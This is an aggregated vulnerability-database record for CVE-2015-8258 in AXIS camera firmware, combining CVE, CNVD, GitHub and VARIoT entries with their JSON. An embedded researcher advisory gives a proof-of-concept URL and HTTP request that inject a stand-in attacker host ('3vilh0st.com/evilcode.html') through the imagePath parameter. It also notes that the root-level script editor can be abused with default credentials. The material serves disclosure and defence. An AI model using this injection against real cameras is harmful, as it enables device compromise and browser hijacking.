CVE-2015-8258 (GCVE-0-2015-8258)

Vulnerability from cvelistv5 – Published: 2017-04-10 03:00 – Updated: 2024-08-06 08:13

Summary

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."

Severity ?

No CVSS data available.

CWE

resource injection

Assigner

certcc

References

URL

	Vendor	Product	Version
	n/a	AXIS Communications products with firmware through 5.80.x	Affected: AXIS Communications products with firmware through 5.80.x

CNVD-2017-04177

Vulnerability from cnvd - Published: 2017-04-10

Title

AXIS通讯跨站脚本漏洞

Description

AXIS Communications是一款网络摄像机。 AXIS通讯存在跨站脚本漏洞，允许攻击者利用漏洞注入任意的Web脚本或HTML。

Severity

中

Formal description

目前没有详细的解决方案提供： http://www.axis.com

Reference

https://www.exploit-db.com/exploits/41625/

Impacted products

Name
Axis Communications Firmwares <5.80.x

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2015-8258"
    }
  },
  "description": "AXIS Communications\u662f\u4e00\u6b3e\u7f51\u7edc\u6444\u50cf\u673a\u3002\r\n\r\nAXIS\u901a\u8baf\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u4efb\u610f\u7684Web\u811a\u672c\u6216HTML\u3002",
  "discovererName": "Orwelllabs",
  "formalWay": "\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u7684\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.axis.com",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2017-04177",
  "openTime": "2017-04-10",
  "products": {
    "product": "Axis Communications Firmwares \u003c5.80.x"
  },
  "referenceLink": "https://www.exploit-db.com/exploits/41625/",
  "serverity": "\u4e2d",
  "submitTime": "2017-03-20",
  "title": "AXIS\u901a\u8baf\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e"
}

GHSA-RH8M-WM96-4276

Vulnerability from github – Published: 2022-05-17 02:50 – Updated: 2025-04-20 03:35

Details

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."

Severity ?

7.5 (High)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2015-8258"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-10T03:59:00Z",
    "severity": "HIGH"
  },
  "details": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\"",
  "id": "GHSA-rh8m-wm96-4276",
  "modified": "2025-04-20T03:35:39Z",
  "published": "2022-05-17T02:50:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8258"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/41625"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

VAR-201704-0285

Vulnerability from variot - Updated: 2023-12-18 13:24

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability.". AXISCommunications is a webcam. A cross-site scripting vulnerability exists in AXIS communications, allowing an attacker to exploit a vulnerability to inject arbitrary web scripts or HTML. Axis Communications is a network camera product of Axis, Sweden. 0RWELLL4BS **** security advisory olsa-2015-8258 PGP: 79A6CCC0 @orwelllabs

Advisory Information

Title: ImagePath Resource Injection/Open script editor
Vendor: AXIS Communications
Research and Advisory: Orwelllabs
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8258
Affected Versions: Firmwares versions <lt 5.80.x
IoT Attack Surface: Device Administrative Interface/Authentication/Autho rization
OWASP IoTTop10: I1, I2

Technical Details

The variable "imagePath=" (that is prone to XSS in a large range of products) also can be used to resource injection intents. If inserted a URL in this variable will be made an GET request to this URL, so this an interesting point to request malicious codes from the attacker machine, and of course, the possibilities are vast (including hook the browser).

An attacker sends the following URL for the current Web user interface of the camera: http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0 st.com/evilcode.html

This request will be processed normally and will return the status code 200 (OK):

[REQUEST]

GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1 Host: {axisvulnhost} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX", nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb", uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html", response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth, nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs" Connection: keep-alive

GET /evilcode.html HTTP/1.1 Host: www.3vilh0st.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: image/png,image/;q=0.8,/*;q=0.5 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0 st.com/evilcode.html Connection: keep-alive

The server response can be seen below (with the clipping of the affected HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):

[..SNIP..]

function listVideoSources() { var formInt = document.listFormInt; var formExt = document.listFormExt; var formCrop = document.listFormCrop; var presetForm = document.listFormPreset; var form = document.WizardForm var currentPath = 'http://www.3vilh0st.com/evilcode.html'; var imageSource;

[..SNIP..]

var reload = false; reload |= (other != null && other.search("seq=yes") >= 0); reload |= (other != null && other.search("streamprofile=") >= 0); reload |= ((other == null || (other != null && other.search("streamprofile= ;)(r") == -1)) && ('' != "")); reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');

[..SNIP..]

[..SNIP..] // Draw the scale buttons var currentResolution = 0 var width = 0 var height = 0 var imagepath = "http://www.3vilh0st.com/evilcode.html" var resStart = imagepath.indexOf("resolution=") if (resStart != -1) { var resStop = imagepath.indexOf("&", resStart) [..SNIP..] =================== view.shtml snips ===================== 447 function zoom(size) 448 { 449 var url = document.URL; 450 451 if (url.indexOf("?") == -1) { 452 url += "F?size=" + size 453 } else if (url.indexOf("size=") == -1) { 454 url += "&size=" + size 455 } else { 456 var searchStr = "size=" 457 var replaceStr = "size=" + size 458 var re = new RegExp(searchStr , "g") 459 url = url.replace(re, replaceStr) 460 } 461 462 document.location = url; 463 } 464 465 var aNewImagePath; 466 467 function reloadPage() 468 { 469 document.location = aNewImagePath; 470 } 471 [ SNIP ] 567 aNewImagePath = '/view/view.shtml?id=&imagePath=' + escape(imagePath) + size; 568 if (other != null) 569 aNewImagePath += other; 570 571 /* append preset parameters so that preset postion is selected in drop down list after reload */ 572 if (presetName != '') 573 aNewImagePath += "&gotopresetname=" + escape(presetName); 574 else if (gotopresetname != '') 575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname); 576 577 if( newCamera != '') 578 aNewImagePath += "&camera=" + escape(newCamera); ---*--- Some legitimate resources can be very interesting to cybercriminals with your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case there are some resources, like the "Open Script Editor". By this resource the user can edit any file in the operation system with root privileges, because everything (in the most part of IoT devices) runs with root privileges, this is other dangerous point to keep in mind. > Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting' Well, one can say that this feature is restricted to the administrator of the camera, and this would be true if customers were forced to change the default password during setup phase with a strong password policy, since change "pass" to "pass123" does not solve the problem. The aggravating factor is that there are thousands of products available on the internet, running with default credentials. Vendor Information, Solutions and Workarounds +++++++++++++++++++++++++++++++++++++++++++++ According to the manufacturer, the resource injection vulnerability was fixed in firmware 5.60, but we identified that the problem still occurred in 5.80.x versions of various product models. Check for updates on the manufacturer's website. About Open Script Editor,It was considered that in order to have access to this feature, it is necessary to be authenticated as an admin, but if there is no policy that forces the client to change the password during the product setup (ease vs. security) and also requires a password complexity, having an administrative credential to abuse the functionality is not exactly an impediment (e.g: botnets that bring embedded in the code a relation of default credentials for that type of device) Credits ======= These vulnerabilities has been discovered and published by Orwelllabs. Legal Notices ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ================ https://www.exploit-db.com/author/?a=8225 https://packetstormsecurity.com/files/author/12322/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0285",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "communications",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "axis",
        "version": "5.80.3"
      },
      {
        "model": "communications",
        "scope": null,
        "trust": 0.8,
        "vendor": "axis",
        "version": null
      },
      {
        "model": "communications s",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "axis",
        "version": "5.80.x"
      },
      {
        "model": "communications",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "axis",
        "version": "5.80.3"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:axis:axis_communications_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.80.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OrwellLabs",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "141672"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2015-8258",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-8258",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-04177",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-86219",
            "impactScore": 6.9,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:C/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-8258",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-8258",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-04177",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201704-529",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-86219",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-8258",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\". AXISCommunications is a webcam. A cross-site scripting vulnerability exists in AXIS communications, allowing an attacker to exploit a vulnerability to inject arbitrary web scripts or HTML. Axis Communications is a network camera product of Axis, Sweden.           0RWELLL4BS\n          **********\n       security advisory\n         olsa-2015-8258\n         PGP: 79A6CCC0\n          @orwelllabs\n\n\n\n\nAdvisory Information\n====================\n- Title: ImagePath Resource Injection/Open script editor\n- Vendor: AXIS Communications\n- Research and Advisory: Orwelllabs\n- Class: Improper Input Validation [CWE-20]\n- CVE Name: CVE-2015-8258\n- Affected Versions: Firmwares versions \u003clt 5.80.x\n- IoT Attack Surface: Device Administrative Interface/Authentication/Autho\nrization\n- OWASP IoTTop10: I1, I2\n\n\n\nTechnical Details\n=================\nThe variable \"imagePath=\" (that is prone to XSS in a large range of\nproducts) also can be used to resource injection intents. If inserted a URL\nin this variable will be made an GET request to this URL, so this an\ninteresting point to request malicious codes from the attacker machine, and\nof course, the possibilities are vast (including hook the browser). \n\n\nAn attacker sends the following URL for the current Web user interface of\nthe camera:\nhttp://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0\nst.com/evilcode.html\n\nThis request will be processed normally and will return the status code 200\n(OK):\n\n[REQUEST]\n\nGET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1\nHost: {axisvulnhost}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101\nFirefox/41.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Digest username=\"Winst0n\", realm=\"AXIS_XXXXXXXXXXX\",\nnonce=\"00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb\",\nuri=\"/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html\",\nresponse=\"5xxxxxxxxxxxxxxxxxxxxxx\", qop=auth,\nnc=0000002b, cnonce=\"00rw3ll4bs0rw3lll4bs\"\nConnection: keep-alive\n\n\nGET /evilcode.html HTTP/1.1\nHost: www.3vilh0st.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101\nFirefox/41.0\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\nAccept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0\nst.com/evilcode.html\nConnection: keep-alive\n\nThe server response can be seen below (with the clipping of the affected\nHTML code snippets - just look for \"http://www.3vilh0st.com/evilcode.html\"):\n\n\n\u003ctable border=\"0\" cellpadding=\"3\" cellspacing=\"3\"\u003e\n \u003ctr\u003e\n  \u003ctd id=\"videoStreamTable\"\u003e\n   \u003cscript language=\"JavaScript\"\u003e\n    \u003c!--\n     video(\u0027http://www.3vilh0st.com/evilcode.html\u0027);\n    // --\u003e\n   \u003c/script\u003e\n  \u003c/td\u003e\n \u003c/tr\u003e\n\u003c/table\u003e\n\n[..SNIP..]\n\nfunction listVideoSources()\n{\nvar formInt = document.listFormInt;\nvar formExt = document.listFormExt;\nvar formCrop = document.listFormCrop;\nvar presetForm = document.listFormPreset;\nvar form = document.WizardForm\nvar currentPath = \u0027http://www.3vilh0st.com/evilcode.html\u0027;\nvar imageSource;\n\n[..SNIP..]\n\nvar reload = false;\nreload |= (other != null \u0026\u0026 other.search(\"seq=yes\") \u003e= 0);\nreload |= (other != null \u0026\u0026 other.search(\"streamprofile=\") \u003e= 0);\nreload |= ((other == null || (other != null \u0026\u0026 other.search(\"streamprofile=\n;)(r\") == -1)) \u0026\u0026 (\u0027\u0027 != \"\"));\nreload |= (imagePath != \u0027http://www.3vilh0st.com/evilcode.html\u0027);\n\n[..SNIP..]\n\n\u003cscript SRC=\"/incl/activeX.js?id=69\"\u003e\u003c/script\u003e\n\u003c/head\u003e\n\u003cbody class=\"bodyBg\" topmargin=\"0\" leftmargin=\"15\" marginwidth=\"0\"\nmarginheight=\"0\" onLoad=\"DrawTB(\u0027no\u0027, \u0027http://www.3vilh0st.com/evilcode.html\u0027,\n\u00271\u0027, \u00270\u0027, \u0027no\u0027, \u0027no\u0027, \u0027true\u0027, getStreamProfileNbr());\" onResize=\"\"\u003e\n\u003cscript language=\"JavaScript\"\u003e\n\n[..SNIP..]\n\n// Draw the scale buttons\nvar currentResolution = 0\nvar width = 0\nvar height = 0\nvar imagepath = \"http://www.3vilh0st.com/evilcode.html\"\nvar resStart = imagepath.indexOf(\"resolution=\")\nif (resStart != -1) {\nvar resStop = imagepath.indexOf(\"\u0026\", resStart)\n\n[..SNIP..]\n\n\n=================== view.shtml snips =====================\n\n 447 function zoom(size)\n 448 {\n 449   var url = document.URL;\n 450\n 451   if (url.indexOf(\"?\") == -1) {\n 452     url += \"F?size=\" + size\n 453   } else if (url.indexOf(\"size=\") == -1) {\n 454     url += \"\u0026size=\" + size\n 455   } else {\n 456     var searchStr = \"size=\u003c!--#echo var=\"size\"\noption=\"encoding:javascript\" --\u003e\"\n 457     var replaceStr = \"size=\" + size\n 458     var re = new RegExp(searchStr , \"g\")\n 459     url = url.replace(re, replaceStr)\n 460   }\n 461\n 462   document.location = url;\n 463 }\n 464\n 465 var aNewImagePath;\n 466\n 467 function reloadPage()\n 468 {\n 469   document.location = aNewImagePath;\n 470 }\n 471\n\n[ SNIP ]\n\n 567     aNewImagePath = \u0027/view/view.shtml?id=\u003c!--#echo\nvar=\"ssi_request_id\" option=\"encoding:url\" --\u003e\u0026imagePath=\u0027 +\nescape(imagePath) + size;\n 568     if (other != null)\n 569       aNewImagePath += other;\n 570 \u003c!--#if expr=\"$ptzpresets = yes\" --\u003e\n 571     /* append preset parameters so that preset postion is selected in\ndrop down list after reload */\n 572     if (presetName != \u0027\u0027)\n 573       aNewImagePath += \"\u0026gotopresetname=\" + escape(presetName);\n 574     else if (gotopresetname != \u0027\u0027)\n 575       aNewImagePath += \"\u0026gotopresetname=\" + escape(gotopresetname);\n 576\n 577     if( newCamera != \u0027\u0027)\n 578       aNewImagePath += \"\u0026camera=\" + escape(newCamera);\n\n\n\n---*---\nSome legitimate resources can be very interesting to cybercriminals with\nyour hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case\nthere are some resources, like the \"Open Script Editor\". By this resource\nthe user can edit any file in the operation system with root privileges,\nbecause everything (in the most part of IoT devices) runs with root\nprivileges, this is other dangerous point to keep in mind. \n\n\u003e Open Script Editor path: \u0027System Options\u0027 -\u003e \u0027Advanced\u0027 -\u003e \u0027Scripting\u0027\n\nWell, one can say that this feature is restricted to the administrator of\nthe camera, and this would be true if customers were forced  to change the\ndefault password during setup phase with a strong password policy, since\nchange \"pass\" to \"pass123\" does not solve the problem. The aggravating\nfactor is that there are thousands of products available on the internet,\nrunning with default credentials. \n\n\nVendor Information, Solutions and Workarounds\n+++++++++++++++++++++++++++++++++++++++++++++\nAccording to the manufacturer, the resource injection vulnerability was\nfixed in firmware 5.60, but we identified that the problem still occurred\nin 5.80.x versions of various product models. Check for updates on the\nmanufacturer\u0027s website. \n\nAbout Open Script Editor,It was considered that in order to have access to\nthis feature, it is necessary to be authenticated as an admin, but if there\nis no policy that forces the client to change the password during the\nproduct setup (ease vs. security) and also requires a password complexity,\nhaving an administrative credential to abuse the functionality is not\nexactly an impediment (e.g: botnets that bring embedded in the code a\nrelation of default credentials for that type of device)\n\n\nCredits\n=======\nThese vulnerabilities has been discovered and published by Orwelllabs. \n\n\nLegal Notices\n=============\nThe information contained within this advisory is supplied \"as-is\" with no\nwarranties or guarantees of fitness of use or otherwise. We accept no\nresponsibility for any damage caused by the use or misuse of this\ninformation. \n\n\nAbout Orwelllabs\n================\nhttps://www.exploit-db.com/author/?a=8225\nhttps://packetstormsecurity.com/files/author/12322/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "db": "PACKETSTORM",
        "id": "141672"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-86219",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41625",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-8258",
        "trust": 3.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "41625",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "141672",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-97252",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "PACKETSTORM",
        "id": "141672"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "id": "VAR-201704-0285",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      }
    ],
    "trust": 1.35
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:24:29.699000Z",
